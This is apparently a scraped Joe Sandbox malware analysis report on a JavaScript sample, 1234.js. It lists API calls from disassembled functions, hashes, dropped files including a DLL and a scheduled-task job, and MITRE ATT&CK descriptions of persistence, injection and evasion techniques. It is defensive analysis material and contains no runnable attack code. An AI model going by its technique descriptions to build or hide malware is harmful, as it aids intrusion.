_isleadbyte_l.LIBCMT ref: 00007FFE1A51DAE6
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFE1A51970E), ref: 00007FFE1A51DB25
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFE1A51970E), ref: 00007FFE1A51DB73
_errno.LIBCMT ref: 00007FFE1A51DB7D

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: c1980f434cffeb90a237ddd52e95a6ef554b239d004aac1eacc3ead14d471610
Instruction ID: 5f911f2471ad9a20cdefa5312efda9a0294db910f879ad48996c3f654479e4df
Opcode Fuzzy Hash: c1980f434cffeb90a237ddd52e95a6ef554b239d004aac1eacc3ead14d471610
Instruction Fuzzy Hash: A541963270CB8286E7609F16918057977A2EB46FA4F1441B6DB8E577A5CF3CD8418B00

Function 00007FFE1A513A90 Relevance: 7.6, APIs: 5, Instructions: 81fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A5125DB
Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A512614

CreateFileW.KERNEL32 ref: 00007FFE1A513AF2
SetFilePointer.KERNEL32 ref: 00007FFE1A513B16
CloseHandle.KERNEL32 ref: 00007FFE1A513B91

Part of subcall function 00007FFE1A515980: GetProcessHeap.KERNEL32(?,?,?,00007FFE1A5167BF), ref: 00007FFE1A515989

SetFilePointer.KERNEL32 ref: 00007FFE1A513B44
ReadFile.KERNEL32 ref: 00007FFE1A513B60

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$ByteCharMultiPointerWide$CloseCreateHandleHeapProcessRead
String ID:
API String ID: 1454824168-0
Opcode ID: e979776ee975cefeadad5dac6b7ccabe5dd46d530c91dccb6f2e97dc089be6a9
Instruction ID: 4e748f98341836d4afcac64cdc0646d8da10593ec7bb404815517456be14a891
Opcode Fuzzy Hash: e979776ee975cefeadad5dac6b7ccabe5dd46d530c91dccb6f2e97dc089be6a9
Instruction Fuzzy Hash: C931C621B0CA4286EA509B27646063A7292FF86FB4F5841F6DE8E077A5EF3CD4018740

Function 00007FFE1A512BA0 Relevance: 7.5, APIs: 5, Instructions: 39networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE1A512BB6
gethostname.WS2_32 ref: 00007FFE1A512BC8
gethostbyname.WS2_32 ref: 00007FFE1A512BD8
GetModuleHandleW.KERNEL32 ref: 00007FFE1A512BFB
inet_ntoa.WS2_32 ref: 00007FFE1A512C03

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: HandleModuleStartupgethostbynamegethostnameinet_ntoa
String ID:
API String ID: 3950597033-0
Opcode ID: 820f33a72edd462d6bbf95b7c83a6fc285ab115bf962e10fae1457ffdc9254b3
Instruction ID: 1ad4171330f675ff2ccac12ec9d11a5d71457d7a17a1379c8c01c8e8979deb1b
Opcode Fuzzy Hash: 820f33a72edd462d6bbf95b7c83a6fc285ab115bf962e10fae1457ffdc9254b3
Instruction Fuzzy Hash: 6C115E3270CA8693DA218B61F45437D6762FB9AFA8F8455B6C64E033A5DF3CD4498B00

Function 00007FFE1A513850 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A5125DB
Part of subcall function 00007FFE1A5125B0: MultiByteToWideChar.KERNEL32 ref: 00007FFE1A512614

CreateFileW.KERNEL32 ref: 00007FFE1A5138B8
SetFilePointer.KERNEL32 ref: 00007FFE1A5138D2
WriteFile.KERNEL32 ref: 00007FFE1A5138EB
CloseHandle.KERNEL32 ref: 00007FFE1A513905

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$ByteCharMultiWide$CloseCreateHandlePointerWrite
String ID:
API String ID: 2756471129-0
Opcode ID: 5403cfd95db986b316707241514d924a2bc15e613ed6cb99a5253c2fec971d89
Instruction ID: 68b333a80d24d097387c652c107b71ccc1a6dbcc4a03bd5713d84017a636cf2f
Opcode Fuzzy Hash: 5403cfd95db986b316707241514d924a2bc15e613ed6cb99a5253c2fec971d89
Instruction Fuzzy Hash: A611C36170CB4186FB509F27745177A6692BB86FF4F0802B6EE8E07BA5DE3CD4458B40

Function 00007FFE1A516D90 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFE1A516DCC
SetFilePointer.KERNEL32 ref: 00007FFE1A516DE6
WriteFile.KERNEL32 ref: 00007FFE1A516E04
CloseHandle.KERNEL32 ref: 00007FFE1A516E17

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: b8dd40a9ccc700a02c156772fcb841ebd7cc93f99e9ee328cf72f3f13bff9a5c
Instruction ID: 526ce1214b6b38eff062239c4abc8e5977517d97a45efab4ab402db76b8612c5
Opcode Fuzzy Hash: b8dd40a9ccc700a02c156772fcb841ebd7cc93f99e9ee328cf72f3f13bff9a5c
Instruction Fuzzy Hash: F6018231708B5182E3108B66B85462AB792FB85FF4F444375EAAE43FA8CF3CD4558B40

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1234.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Tyrannosaurus Tech\Updater.dll

C:\Users\user\AppData\Local\Temp\rad00257.tmp

C:\Users\user\AppData\Local\Temp\rad603BF.tmp

C:\Windows\Tasks\Tyrannosaurus Tech.job

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exePID: 4320, Parent PID: 2580

General

Chronological Activities

Windows Analysis Report
1234.js

Function 00007FFE1A511C40 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 320
networklibraryloaderCOMMON

Function 00007FFE1A5145E0 Relevance: 19.7, APIs: 13, Instructions: 228
COMMON

Function 00007FFE1A515A20 Relevance: 16.7, APIs: 11, Instructions: 178
libraryloaderCOMMON

Function 00007FFE1A5113A0 Relevance: 12.1, APIs: 8, Instructions: 120
libraryloaderfileCOMMON

Function 00007FFE1A517BB0 Relevance: 10.6, APIs: 7, Instructions: 90
libraryloaderCOMMON

Function 00007FFE1A514B50 Relevance: 7.7, APIs: 5, Instructions: 156
COMMON

Function 00007FFE1A514A6D Relevance: 7.6, APIs: 5, Instructions: 145
COMMON

Function 00007FFE1A5149A3 Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Function 00007FFE1A51497C Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Function 00007FFE1A5149CA Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Function 00007FFE1A5148E2 Relevance: 7.6, APIs: 5, Instructions: 136
COMMON

Function 00007FFE1A514C35 Relevance: 7.6, APIs: 5, Instructions: 125
COMMON

Function 00007FFE1A514C96 Relevance: 7.6, APIs: 5, Instructions: 105
COMMON

Function 00007FFE1A511900 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
libraryloaderCOMMON

Function 00007FFE1A5121E0 Relevance: 6.1, APIs: 4, Instructions: 61
synchronizationCOMMON